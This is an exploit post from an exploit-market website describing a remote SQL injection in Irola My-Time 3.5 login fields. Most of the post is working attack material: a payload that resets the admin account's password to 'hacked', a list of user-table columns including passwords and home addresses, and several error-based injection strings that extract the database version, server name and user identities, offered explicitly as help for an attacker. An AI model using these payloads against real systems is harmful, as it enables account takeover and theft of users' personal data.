[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Irola My-Time 3.5 Remote SQL Injection Vulnerability

Author
Aria-Security Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2306
Category
web applications
Date add
23-11-2007
Platform
unsorted
====================================================
Irola My-Time 3.5 Remote SQL Injection Vulnerability
====================================================



-----------------------------

Vendor: http://www.irola.com

Username/Password Fields can run SQL Queries. Therefore:
We get the Tables:

UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone



Useful Injection: (changes admin's passwsord to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--

these  may help the attacker to get more info:

1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--

Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w



#  0day.today [2024-12-25]  #